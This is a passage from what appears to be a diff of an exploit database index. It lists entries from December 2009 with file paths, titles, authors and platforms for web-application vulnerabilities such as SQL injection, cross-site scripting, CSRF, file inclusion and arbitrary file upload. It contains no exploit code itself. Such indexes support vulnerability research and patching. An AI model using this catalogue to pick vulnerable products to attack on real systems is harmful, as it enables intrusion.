Bypass",2009-12-14,Nicob,webapps,multiple,80 +10432,exploits/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,webapps,multiple,80 +10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",webapps,linux,80 +10436,exploits/php/webapps/10436.txt,"Link Up Gold - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,webapps,php, +10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php, +10438,exploits/php/webapps/10438.txt,"AdManagerPro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,webapps,php, +10439,exploits/php/webapps/10439.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php, +10440,exploits/php/webapps/10440.txt,"Easy Banner Pro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,webapps,php, +10442,exploits/php/webapps/10442.txt,"Text Exchange Pro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,webapps,php, +10444,exploits/php/webapps/10444.txt,"mini Hosting Panel - Cross-Site Request Forgery (Change Admin Settings)",2009-12-14,"Milos Zivanovic",webapps,php, +10445,exploits/php/webapps/10445.txt,"Tender System 0.9.5b - Local File Inclusion",2009-12-14,Packetdeath,webapps,php, +10446,exploits/php/webapps/10446.txt,"WSCreator 1.1 - Blind SQL Injection",2009-12-14,"Salvatore Fresta",webapps,php, +10447,exploits/php/webapps/10447.txt,"Traidnt Discovery - Cross-Site Request Forgery (Create Staff Account)",2009-12-14,G0D-F4Th3r,webapps,php, +10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple, +10449,exploits/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection",2009-12-15,Securitylab.ir,webapps,asp, +10450,exploits/php/webapps/10450.txt,"Linkster - PHP/MySQL SQL Injection",2009-12-15,"Angela Zhang",webapps,php, +10452,exploits/php/webapps/10452.txt,"Ez News Manager / Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-15,"Milos Zivanovic",webapps,php, +10453,exploits/php/webapps/10453.txt,"SitioOnline - SQL Injection",2009-12-15,4lG3r14n0-t3r0,webapps,php, +10454,exploits/php/webapps/10454.txt,"Ez Faq Maker - Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",webapps,php, +10455,exploits/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - 'PageId' SQL Injection",2009-12-15,Red-D3v1L,webapps,asp, +10456,exploits/asp/webapps/10456.txt,"ClickTrackerASP - 'sitedetails.asp?siteid' SQL Injection",2009-12-15,R3d-D3V!L,webapps,asp, +10457,exploits/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,webapps,asp, +10458,exploits/php/webapps/10458.txt,"Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",webapps,php, +10461,exploits/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic",webapps,php, +10462,exploits/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,webapps,php, +10463,exploits/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,webapps,php, +10464,exploits/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,webapps,asp, +10465,exploits/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,webapps,asp, +10467,exploits/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",webapps,php, +10470,exploits/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,webapps,asp, +10472,exploits/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",webapps,php, +10473,exploits/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,webapps,asp, +10474,exploits/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,webapps,php, +10476,exploits/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,webapps,asp, +10478,exploits/php/webapps/10478.txt,"iSupport 1.8 - Cross-Site Scripting / Local File Inclusion",2009-12-16,"Stink & Essandre",webapps,php, +10479,exploits/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection",2009-12-16,"Nahuel Grisolia",webapps,php, +10480,exploits/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",webapps,php, +10481,exploits/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",webapps,php, +10482,exploits/asp/webapps/10482.txt,"Codefixer Membership - Remote Database Disclosure",2009-12-16,ViRuSMaN,webapps,asp, +10483,exploits/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,webapps,asp, +10485,exploits/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",webapps,php, +10488,exploits/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",webapps,php, +10492,exploits/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,webapps,php, +10493,exploits/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX & Cr3W-DZ",webapps,php, +10494,exploits/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX & Cr3W-DZ",webapps,php, +10495,exploits/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',webapps,php, +10496,exploits/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,webapps,asp, +10497,exploits/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",webapps,php, +10498,exploits/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php?id' SQL Injection",2009-12-16,R3d-D3V!L,webapps,php, +10499,exploits/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",webapps,php, +10500,exploits/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,webapps,php, +10501,exploits/asp/webapps/10501.txt,"Texas Rankem - 'player_id' SQL Injection",2009-12-16,R3d-D3V!L,webapps,asp, +10502,exploits/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,webapps,asp, +10503,exploits/asp/webapps/10503.txt,"ASPGuest - 'edit.asp?ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,webapps,asp, +10504,exploits/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp?CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,webapps,asp, +10505,exploits/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,webapps,asp, +10507,exploits/asp/webapps/10507.txt,"Charon Cart 3.0 - 'ContentID' Blind SQL Injection",2009-12-17,R3d-D3V!L,webapps,asp, +10511,exploits/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",webapps,php, +10512,exploits/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",webapps,php, +10513,exploits/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",webapps,windows, +10514,exploits/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",webapps,windows, +10515,exploits/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Arbitrary Add Admin",2009-12-17,RENO,webapps,php, +10516,exploits/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-17,bi0,webapps,php, +10517,exploits/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,webapps,php, +10520,exploits/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,webapps,asp, +10522,exploits/php/webapps/10522.txt,"Pre Job Board 1.0 - Authentication Bypass",2009-12-17,bi0,webapps,php, +10523,exploits/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,webapps,php, +10525,exploits/asp/webapps/10525.txt,"Pre Jobo .NET - Authentication Bypass",2009-12-17,bi0,webapps,asp, +10526,exploits/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection",2009-12-17,R3d-D3V!L,webapps,asp, +10527,exploits/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,webapps,php, +10528,exploits/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection",2009-12-17,R3d-D3V!L,webapps,php, +10529,exploits/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,webapps,asp, +10531,exploits/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,webapps,php, +10532,exploits/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",webapps,php, +10533,exploits/php/webapps/10533.txt,"VirtueMart - 'Product_ID' SQL Injection",2009-12-17,Neo-GabrieL,webapps,php, +10534,exploits/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",webapps,php, +10535,exploits/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,webapps,php, +10537,exploits/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,cr4wl3r,webapps,php, +10540,exploits/asp/webapps/10540.txt,"E-Smart Cart - SQL Injection",2009-12-18,R3d-D3V!L,webapps,asp, +10543,exploits/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX & Cr3W-DZ",webapps,php, +10545,exploits/php/webapps/10545.txt,"Joomla! Component com_jbook - Blind SQL Injection",2009-12-18,FL0RiX,webapps,php, +10546,exploits/php/webapps/10546.txt,"Joomla! Component com_digistore - SQL Injection",2009-12-18,FL0RiX,webapps,php, +10547,exploits/php/webapps/10547.txt,"Joomla! Component com_acmisc - SQL Injection",2009-12-18,FL0RiX,webapps,php, +10548,exploits/php/webapps/10548.txt,"Joomla! Component com_zcalendar - Blind SQL Injection",2009-12-18,FL0RiX,webapps,php, +10549,exploits/php/webapps/10549.txt,"Joomla! Component Event Manager - Blind SQL Injection",2009-12-18,FL0RiX,webapps,php, +10550,exploits/php/webapps/10550.txt,"Joomla! Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,webapps,php, +10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php, +10555,exploits/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities",2009-12-19,Global-Evolution,webapps,php, +10558,exploits/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,ViRuSMaN,webapps,asp, +10560,exploits/php/webapps/10560.txt,"Lizard Cart - Multiple SQL Injections",2009-12-19,cr4wl3r,webapps,php, +10561,exploits/php/webapps/10561.txt,"CFAGCMS - SQL Injection",2009-12-19,cr4wl3r,webapps,php, +10562,exploits/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php, +10564,exploits/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php, +10566,exploits/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,webapps,php, +10567,exploits/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,webapps,php, +10568,exploits/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",webapps,php, +10569,exploits/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusions",2009-12-20,cOndemned,webapps,php, +10570,exploits/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection",2009-12-20,Global-Evolution,webapps,php, +10571,exploits/php/webapps/10571.txt,"PacketFence Network Access Controller - Cross-Site Scripting",2009-12-20,K053,webapps,php, +10572,exploits/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",webapps,php, +10573,exploits/asp/webapps/10573.txt,"8Pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,webapps,asp, +10574,exploits/php/webapps/10574.txt,"phUploader 2 - Arbitrary File Upload",2009-12-20,wlhaan-hacker,webapps,php, +10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,webapps,php, +10576,exploits/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure",2009-12-21,LionTurk,webapps,asp, +10578,exploits/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Arbitrary File Upload",2009-12-21,"Master Mind",webapps,php, +10582,exploits/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,webapps,asp, +10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php, +10584,exploits/php/webapps/10584.txt,"PHPhotoalbum - Arbitrary File Upload",2009-12-21,"wlhaan hacker",webapps,php, +10585,exploits/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,webapps,php, +10586,exploits/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,webapps,php, +10587,exploits/php/webapps/10587.txt,"Joomla! Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,webapps,php, +10588,exploits/php/webapps/10588.txt,"PDQ Script 1.0 - 'listingid' SQL Injection",2009-12-21,SecurityRules,webapps,php, +10590,exploits/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection",2009-12-21,Stack,webapps,php, +10591,exploits/php/webapps/10591.txt,"Joomla! Component com_mediaslide - Directory Traversal",2009-12-21,Mr.tro0oqy,webapps,php, +10592,exploits/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,webapps,php, +10594,exploits/php/webapps/10594.txt,"The Uploader 2.0 - Arbitrary File Upload",2009-12-22,"Master Mind",webapps,php, +10597,exploits/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,webapps,php, +10598,exploits/php/webapps/10598.txt,"DeluxeBB 1.3 - Multiple Vulnerabilities",2009-12-22,cp77fk4r,webapps,php, +10599,exploits/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,webapps,php, +10600,exploits/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,webapps,php, +10601,exploits/php/webapps/10601.txt,"Mini File Host 1.5 - Arbitrary File Upload",2009-12-22,MR.Z,webapps,php, +10604,exploits/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,webapps,php, +10606,exploits/php/webapps/10606.txt,"weenCompany - SQL Injection",2009-12-22,Gamoscu,webapps,php, +10609,exploits/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,webapps,php, +10611,exploits/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,webapps,php, +10612,exploits/php/webapps/10612.txt,"Add An Ad Script - Arbitrary File Upload",2009-12-23,MR.Z,webapps,php, +10614,exploits/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,webapps,php, +10615,exploits/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection",2009-12-23,"Hussin X",webapps,php, +10621,exploits/php/webapps/10621.txt,"XP Book 3.0 - login Admin",2009-12-23,"wlhaan hacker",webapps,php, +10624,exploits/php/webapps/10624.txt,"Joomla! Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,webapps,php, +10625,exploits/php/webapps/10625.txt,"Joomla! Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,webapps,php, +10626,exploits/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login",2009-12-24,Sora,webapps,php, +10629,exploits/php/webapps/10629.txt,"Traidnt Gallery - Arbitrary Add Admin",2009-12-24,wlhaan-hacker,webapps,php, +10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple, +10632,exploits/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,webapps,php, +10633,exploits/php/webapps/10633.txt,"Pragyan CMS 2.6.4 - 'search.php' Remote File Inclusion",2009-12-24,Mr.SeCreT,webapps,php, +10637,exploits/asp/webapps/10637.txt,"Web Wiz NewsPad - Database Disclosure",2009-12-24,ViRuSMaN,webapps,asp, +10638,exploits/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure",2009-12-24,ViRuSMaN,webapps,asp, +10639,exploits/asp/webapps/10639.txt,"Snitz Forums 2000 - Database Disclosure",2009-12-24,ViRuSMaN,webapps,asp, +10640,exploits/php/webapps/10640.txt,"Joomla! Component com_schools - SQL Injection",2009-12-24,Mr.tro0oqy,webapps,php, +10645,exploits/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,webapps,php, +10647,exploits/php/webapps/10647.txt,"VideoIsland - Arbitrary File Upload",2009-12-24,RENO,webapps,php, +10648,exploits/php/webapps/10648.txt,"cms -db 0.7.13 - Multiple Vulnerabilities",2009-12-25,cp77fk4r,webapps,php, +10649,exploits/windows/webapps/10649.html,"SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method",2009-12-25,"ThE g0bL!N",webapps,windows, +10652,exploits/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,webapps,php, +10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +10654,exploits/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +10656,exploits/php/webapps/10656.txt,"SoftBiz B2B trading Marketplace Script - SQL Injection",2009-12-25,"AnGrY BoY",webapps,php, +10658,exploits/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +10660,exploits/php/webapps/10660.txt,"barbo91 uploads - Arbitrary File Upload",2009-12-25,indoushka,webapps,php, +10661,exploits/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +10665,exploits/php/webapps/10665.txt,"Jevonweb Guestbook - Remote Admin Access",2009-12-25,Sora,webapps,php, +10666,exploits/php/webapps/10666.txt,"Simple PHP Guestbook - Remote Admin Access",2009-12-25,Sora,webapps,php, +10667,exploits/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10668,exploits/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10669,exploits/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10670,exploits/php/webapps/10670.txt,"vCard PRO 3.1 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10671,exploits/php/webapps/10671.txt,"Info Fisier 1.0 - Arbitrary File Upload",2009-12-26,"wlhaan hacker",webapps,php, +10672,exploits/php/webapps/10672.txt,"kandalf upper 0.1 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10673,exploits/php/webapps/10673.txt,"DieselScripts jokes - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10674,exploits/php/webapps/10674.txt,"DieselScripts jokes - Backup",2009-12-26,indoushka,webapps,php, +10675,exploits/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10677,exploits/php/webapps/10677.txt,"PHPShop 0.6 - Bypass",2009-12-26,indoushka,webapps,php, +10679,exploits/php/webapps/10679.txt,"Quiz - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10680,exploits/php/webapps/10680.txt,"E-Pay - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10681,exploits/php/webapps/10681.txt,"Saibal Download Area 2.0 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10682,exploits/php/webapps/10682.txt,"Dros - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10683,exploits/php/webapps/10683.txt,"TomatoCart - Backup",2009-12-26,indoushka,webapps,php, +10684,exploits/php/webapps/10684.txt,"Upload-Point 1.6 Beta - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10686,exploits/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure",2009-12-26,LionTurk,webapps,asp, +10687,exploits/php/webapps/10687.txt,"SaphpLesson 4.0 food - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10688,exploits/php/webapps/10688.txt,"Flatpress - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10690,exploits/php/webapps/10690.txt,"IMG2ASCII - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10691,exploits/php/webapps/10691.txt,"EZPX My Photoblog 1.2 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10692,exploits/php/webapps/10692.txt,"FreeForum 1.7 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10693,exploits/php/webapps/10693.txt,"FreeForum 1.7 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10694,exploits/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10695,exploits/php/webapps/10695.txt,"Lizard Cart - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10696,exploits/php/webapps/10696.txt,"epay - Backup",2009-12-26,indoushka,webapps,php, +10697,exploits/php/webapps/10697.txt,"e-pay 1.55 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10698,exploits/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,indoushka,webapps,php, +10699,exploits/php/webapps/10699.txt,"dB Masters MultiMedia - Insecure Cookie Handling",2009-12-26,indoushka,webapps,php, +10700,exploits/php/webapps/10700.txt,"Image File Upload - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10701,exploits/php/webapps/10701.txt,"HowMany 2.6 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10703,exploits/php/webapps/10703.txt,"kooora 3.0 - AR Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10704,exploits/php/webapps/10704.txt,"Mega Upload 1.45 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10705,exploits/php/webapps/10705.txt,"Gallery 2.3 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10706,exploits/php/webapps/10706.txt,"MyCart shopping cart - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10707,exploits/php/webapps/10707.txt,"osCommerce 2.2rc2a - Bypass/Create and Download Backup",2009-12-26,indoushka,webapps,php, +10708,exploits/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10710,exploits/php/webapps/10710.txt,"Green Desktiny Customer Support Helpdesk 2.3.1 - SQL Injection",2009-12-26,kaMtiEz,webapps,php, +10711,exploits/php/webapps/10711.txt,"phpAuction - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10712,exploits/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10713,exploits/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,webapps,asp, +10716,exploits/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php?id' SQL Injection",2009-12-26,The_HuliGun,webapps,php, +10717,exploits/php/webapps/10717.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion",2009-12-26,Gamoscu,webapps,php, +10718,exploits/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10719,exploits/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php, +10720,exploits/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10721,exploits/php/webapps/10721.txt,"Nuked-klaN 1.7.7 - Remote File Inclusion",2009-12-26,indoushka,webapps,php, +10722,exploits/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +10725,exploits/php/webapps/10725.txt,"Nuke - SQL Injection",2009-12-27,FormatXformat,webapps,php, +10726,exploits/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",webapps,php, +10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php, +10728,exploits/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,webapps,php, +10729,exploits/php/webapps/10729.txt,"Joomla! Component com_adagency - Local File Inclusion",2009-12-27,FL0RiX,webapps,php, +10730,exploits/php/webapps/10730.txt,"Joomla! Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,webapps,php, +10731,exploits/php/webapps/10731.txt,"Joomla! Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,webapps,php, +10732,exploits/php/webapps/10732.txt,"PHP upload - 'unijimpe' Arbitrary File Upload",2009-12-27,"wlhaan hacker",webapps,php, +10733,exploits/php/webapps/10733.txt,"com_webcamxp - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10734,exploits/php/webapps/10734.txt,"Joomla! Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,webapps,php, +10735,exploits/php/webapps/10735.txt,"com_jm-recommend - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,webapps,php, +10737,exploits/php/webapps/10737.txt,"Joomla! Component FacileForms - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10738,exploits/php/webapps/10738.txt,"Joomla! Component com_qpersonel - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10739,exploits/php/webapps/10739.txt,"Joomla! Component com_oprykningspoint_mc - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10740,exploits/php/webapps/10740.txt,"Joomla! Component com_trabalhe_conosco - Cross-Site Scripting",2009-12-27,Pyske,webapps,php, +10741,exploits/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,webapps,php, +10742,exploits/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,webapps,php, +10743,exploits/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,webapps,php, +10750,exploits/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,webapps,php, +10751,exploits/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection",2009-12-27,BILGE_KAGAN,webapps,php, +10752,exploits/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,webapps,multiple,80 +10753,exploits/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,webapps,multiple,80 +10754,exploits/multiple/webapps/10754.txt,"Joomla! Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,webapps,multiple,80 +10755,exploits/linux/webapps/10755.txt,"egegen turkish script - SQL Injection",2009-12-28,FormatXformat,webapps,linux,80 